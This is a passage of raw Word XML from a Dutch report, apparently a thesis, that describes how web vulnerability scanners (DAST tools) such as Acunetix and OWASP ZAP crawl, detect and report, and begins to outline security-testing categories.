    </w:p>
    <w:p w14:paraId="1BA36ABB" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00B64C80" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r w:rsidRPr="00B64C80">
        <w:t xml:space="preserve">Voordat er gescand kan worden moeten er eerst resources worden opgehaald. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zorgt daarvoor door een delen van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML pagina</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> te scrapen. Scrapen is het proces van het selectief uitknippen van html elementen zoals de anchor tag &lt;a&gt;, wat als attribuut een hyperlink. Wanneer er voldoende gecrawld is kan een scan gestart worden.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67425B8D" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00FB7402" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Detect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF2555" w14:textId="0D276305" w:rsidR="00554FF4" w:rsidRPr="00B64C80" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Bij het detecteren van kwetsbaarheden is precisie dat telt. Tijdens de scan worden probeert de </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kwetsbaarheden in een </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> te detecteren. Om te kunnen meten hoe goed en accuraat een </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kwetsbaarheden detecteert kan de OWASP Benchmark gebruikt worden.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B082A68" w14:textId="32DE471F" w:rsidR="00554FF4" w:rsidRPr="00FB7402" w:rsidRDefault="00FB7402" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Prioritize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Manage</w:t>
      </w:r>
      <w:r w:rsidR="00554FF4" w:rsidRPr="00FB7402">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579DE6E" w14:textId="65C04664" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Na een scan worden alle gevonden kwetsbaarheden </w:t>
      </w:r>
      <w:r w:rsidRPr="002D76DD">
        <w:t>geprioriteerd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in een geïndexeerde lijst en gerapporteerd. De resultaten van de scans worden opgeslagen en kunnen herzien worden voor analytische doeleindes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F570550" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7873C8B8" w14:textId="318867D2" w:rsidR="00554FF4" w:rsidRPr="00723BE8" w:rsidRDefault="0013783D" w:rsidP="0013783D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc491022071"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00796FC3">
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00554FF4" w:rsidRPr="00723BE8">
        <w:t>Acunetix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CE82206" w14:textId="24D2F4D9" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Volgens een brochure van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heeft 70% van alle websites een kwetsbaarheid dat kan leiden tot diefstal van gevoelige data [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Brochure]. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maakt een paar goede punten in </w:t>
      </w:r>
      <w:r w:rsidR="00A62261">
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> brochure zoals</w:t>
      </w:r>
      <w:r w:rsidR="001F7E83">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dat hackers zich concentreren op het volgende: Componenten van webapplicaties als winkelwagens, formulieren, login pagina’s en dynamische </w:t>
      </w:r>
      <w:r w:rsidR="00202F85">
        <w:t>content. Dit is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor een grootdeel waar de web security scanner die ik ontwikkel op zal focussen. Een ander punt die </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maakt is dat </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s 24/7 toegankelijk zijn en dat zij controle hebben over kostbare data omdat zij, als het niet via een API gaat, in de meeste gevallen directe contact hebben met de backend, hoe anders moeten zij aan de data komen. Dit allemaal wordt in de eerste paragraaf toegelicht wat naar mijn mening een zeer goede inleiding is voor het document. Verder in het document vermeld </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00681985">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00B92C98">
        <w:t>cunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B92C98">
        <w:t xml:space="preserve"> dat netwerk security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> amper bescherming biedt tegen </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aanvallen, dit komt doordat de </w:t>
      </w:r>
      <w:r w:rsidR="00F56071">
        <w:t>netwerkpoorten</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80/443 altijd openstaan. De reden dat deze poorten altijd openstaan is omdat zij iede</w:t>
      </w:r>
      <w:r w:rsidR="00ED0B1B">
        <w:t xml:space="preserve">re bezoeker moeten toelaten op </w:t>
      </w:r>
      <w:r>
        <w:t>de website. Anders heeft het geen nut om een website te hosten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406DF84D" w14:textId="7AB624D5" w:rsidR="00554FF4" w:rsidRPr="00B97EC2" w:rsidRDefault="008E57DD" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidR="00DA6DF8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E5722" w14:textId="1570A8F4" w:rsidR="003F19EA" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Zoals je kunt lezen is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> een bedrijf dat zich </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>bezighoudt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> met de security van </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s. Hiervoor hebben zij een </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>DAST-tool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ontwikkeld. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> heeft een </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>desktopversie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ontwikkeld en een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C2414C">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00B92C98">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C2414C">
        <w:t>versie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Ik zal in dit deel de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C2414C">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00B92C98">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C2414C">
        <w:t>versie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> behandelen. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Web Interface is een gebruikersvriendelijke </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> die de gebruiker na het inloggen naar een dashboard brengt. Vanaf het dashboard kunnen gebruikers vier </w:t>
      </w:r>
      <w:r w:rsidR="00C2414C">
        <w:t>managementtaken</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uitvoeren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8A1E9" w14:textId="54A30904" w:rsidR="003F19EA" w:rsidRDefault="00554FF4" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het confi</w:t>
      </w:r>
      <w:r w:rsidR="003F19EA">
        <w:t>gureren en beheren van websites die als targets (Doelwitten) worden ingevoerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6588F30D" w14:textId="00F233E8" w:rsidR="003F19EA" w:rsidRDefault="00C41654" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00D824A4">
        <w:t xml:space="preserve">et starten van een </w:t>
      </w:r>
      <w:r w:rsidR="00F630DE">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00D824A4">
        <w:t>scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478B8CF" w14:textId="0A642B91" w:rsidR="003F19EA" w:rsidRDefault="00C41654" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="003F19EA">
        <w:t>et bekijken van statistieken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354EA4CD" w14:textId="337CB6BD" w:rsidR="003F19EA" w:rsidRDefault="00C41654" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="009A6435">
        <w:t>enereren van een rapport</w:t>
      </w:r>
      <w:r w:rsidR="00F6398E">
        <w:t xml:space="preserve"> wat gebaseerd is op de kwetsbaarheden die gevonden zijn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72362C82" w14:textId="77777777" w:rsidR="00CE696B" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Verder zijn er nog andere kleinere taken zoals het beheren van de gebruikers profiel. Targets zijn websites die de gebruiker als doelwit heeft </w:t>
      </w:r>
      <w:r w:rsidRPr="004F3492">
        <w:t>geregistreerd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>de voorbereiding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van een scan. Na het instellen van een target kan de gebruiker de scan starten. Voor het starten van de scan kan de gebruiker nog een aantal opties instellen. De opties zijn </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>verdeeld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over vier tabs, General, Crawl, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Advanced. In de tab General kan de type scan ingesteld worden, de snelheid van de scan en de logingegevens. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D9E6F" w14:textId="77777777" w:rsidR="00CE696B" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">In de Crawl tab staan alle opties voor het instellen van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zorgt ervoor dat de benodigde informatie wordt verzameld voor de scan. Zoals de hyperlinks en formulieren. De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTTP tab</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is voor het authentiseren van een gebruiker tijdens de scan. De scan kan een login of </w:t>
      </w:r>
      <w:r w:rsidR="00C2414C">
        <w:t>registratieformulier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tegenkomen tijdens de scan en weet dan met deze optie wat er ingevuld moeten worden. De laatste tab Advanced is ervoor de geavanceerde instellingen van de scan. Opties als technologie, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Custom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Headers, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Custom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cookies en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Allowed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kan de gebruiker instellen om de scan te finetunen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1AA73" w14:textId="4DC3EA7B" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Na de scan kan de gebruiker navigeren naar het Scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; Info scherm, hierop kan er naar de statistieken gekeken worden voor het analyseren van het resultaat, ook kan de gebruiker een lijst opvragen met alle uitgevoerde aanvallen en wat het resultaat daarvan is, dit vereist wel technische kennis over </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>IT-security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Verder kan er nog naar de </w:t>
      </w:r>
      <w:r w:rsidR="00F8269A">
        <w:t>sitemap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gekeken worden waar een lijst met alle gescande bestanden staan. Voor elk bestand staat er welke kwetsbaarheden gevonden zijn. Als laatste kan de gebruiker een rapport genereren op basis van de gescande resultaten. Bij het genereren van een rapport kan de gebruiker een template kiezen die de thema een doelgroep van het rapport bepalen. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is met al de opgenoemde features </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> van de voorlopers op gebied van web security scanners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53079C16" w14:textId="77777777" w:rsidR="00BA2E92" w:rsidRDefault="00BA2E92" w:rsidP="00554FF4"/>
    <w:p w14:paraId="381FC7CA" w14:textId="77777777" w:rsidR="00CC03C1" w:rsidRPr="00CB3E4B" w:rsidRDefault="00CC03C1" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D9BD1A" w14:textId="7C1193F9" w:rsidR="00554FF4" w:rsidRPr="00723BE8" w:rsidRDefault="00260084" w:rsidP="00260084">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc491022072"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00796FC3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00740679" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00554FF4" w:rsidRPr="00723BE8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Zap Zed Attack Proxy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="69384D4F" w14:textId="3CF7EE31" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Zed Attack Proxy is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>een</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> flagship project van Open Web Application Security Project. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C52D6">
        <w:t>Het is een open-source security scanner to</w:t>
      </w:r>
      <w:r>
        <w:t>ol</w:t>
      </w:r>
      <w:r w:rsidRPr="00F559BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dat onderhouden wordt door OWASP. Het is gratis te downloaden van de website van OWASP en ook biedt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>OWASP project</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> samenwerking voor software ontwikkelaars die een bijdrage willen maken door te werken aan nieuwe features voor de applicatie. Het project is open-source wat betekent dat OWASP de broncode publieke heeft vrijgegeven. Het project kan worden gedownload op </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hiervoor het een </w:t>
      </w:r>
      <w:r w:rsidR="00E90D9A">
        <w:t>softwareontwikkelaar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> geen toestemming voor nodig. Met een simpele git </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wordt er een kopie van het hele project op jouw computer geplaats. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFAB8C0" w14:textId="5C94F782" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">De security scanner tool is special voor het testen van </w:t>
      </w:r>
      <w:r w:rsidR="003F6E96">
        <w:t>webapplicaties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ontwikkelt. Eerder in dit document heb ik kort samengevat wat een security scanner in het algemeen doet. OWASP heeft in het document [OWASP ZAP 2.6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Started</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Guide] dit onderwerp zelf behandelt. In het hoofdstuk Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Basics definiëren zij security testen als “Software security testen is het proces van beoordelen en testen van systemen om security risico’s en kwetsbaarheden te ontdekken”. Er worden hier twee termen gebruikt die tot de basis taken behoren van een security scan tool: beoordelen en testen. Zij definiëren het beoordelen als het analyseren en ontdekken van kwetsbaarheden zonder de poging tot het exploiteren van deze kwetsbaarheden. Het term testen wordt gedefinieerd als het ontdekken en poging tot exploiteren van kwetsbaarheden. Beide taken hebben als doel kwetsbaarheden te ontdekken, maar het verschil zit in wat zij doen met de </w:t>
      </w:r>
      <w:r w:rsidR="00EB09C6">
        <w:t>kwetsbaarheden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> die ontdekt zijn. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E6A8D" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">In het hoofdstuk [Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Basics] verdelen zij de basis van security testen in vier categorieën:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329A8408" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="007B6871" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B6871">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kwetsbaarheid beoordeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7F474" w14:textId="37C9F01F" w:rsidR="00554FF4" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r>
        <w:t xml:space="preserve">Het systeem is gescand en geanalyseerd voor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E90D9A">
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidR="00271B33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E90D9A">
        <w:t>problemen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA0644" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00412B29" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412B29">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Penetratie test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF4FEC" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="002B2E1E" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r w:rsidRPr="002B2E1E">
        <w:t>Het systeem ondergaat gesimuleerde aanval</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="002B2E1E">
        <w:t>en en het systeem wordt geanalyseerd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B39D5D2" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00412B29" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00412B29">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Runtime test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC9EE5" w14:textId="77777777" w:rsidR="00554FF4" w:rsidRPr="00E67297" w:rsidRDefault="00554FF4" w:rsidP="00554FF4">
      <w:r w:rsidRPr="00E67297">
